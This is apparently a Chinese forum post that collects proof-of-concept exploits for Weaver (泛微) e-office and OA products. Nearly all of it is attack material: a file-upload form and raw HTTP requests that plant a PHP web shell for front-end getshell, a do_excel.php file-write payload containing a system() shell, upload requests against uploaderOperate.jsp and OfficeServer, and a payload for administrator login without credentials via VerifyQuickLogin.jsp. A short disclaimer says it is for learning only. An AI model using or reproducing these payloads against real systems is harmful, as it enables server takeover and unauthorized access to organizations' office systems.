吉沃运营专员 发表于 2022-8-4 10:17:44

泛微漏洞 PoC 整理

本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!
1、泛微 eoffice10 前台 getshell
eoffice10/version.json

<form method='post'
action='http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php'
enctype="multipart/form-data" >
<input type="file" name="FileData"/></br></br>
<input type="text" name="FormData" value="1"/></br></br>
<button type=submit value="上传">上传</button> </form>
shell http[:]//XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/Document/test.php

POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
Host: XXXXXXXX:8010
Content-Length: 378
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/91.0.4472.77 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: close
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FileData"; filename="1.jpg"
Content-Type: image/jpeg
<?php echo md5(1);?>
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition: form-data; name="FormData"
{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'}
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--
2、泛微 E-office do_excel.php 任意文件写入漏洞
URL:

/WWW/general/charge/charge_list/do_excel.php
Payload:

html=<?php system($_POST);?>
3、泛微 OA uploaderOperate.jsp 文件上传
/workrelate/plan/util/uploaderOperate.jsp 存在文件上传漏洞

POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
Host: X.X.X.X
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 393
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="secId"
1
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="Filedata"; filename="testlog.txt"
Test
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="plandetailid"
1
------WebKitFormBoundarymVk33liI64J7GQaK—
/defaultroot/officeserverservlet 确认为历史漏洞 (文件上传)

将文件放至网站根路径下,在数据包中将 fileid 替换

POST /OfficeServer HTTP/1.1
Host: X.X.X.X
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 207
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="aaa"
{'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'20462'}
------WebKitFormBoundarymVk33liI64J7GQaK—
4、泛微 OA 0day 管理员任意登录
URL:

/mobile/plugin/VerifyQuickLogin.jsp
Payload:

identifier=1&language=1&ipaddress=
页: [1]
查看完整版本: 泛微漏洞 PoC 整理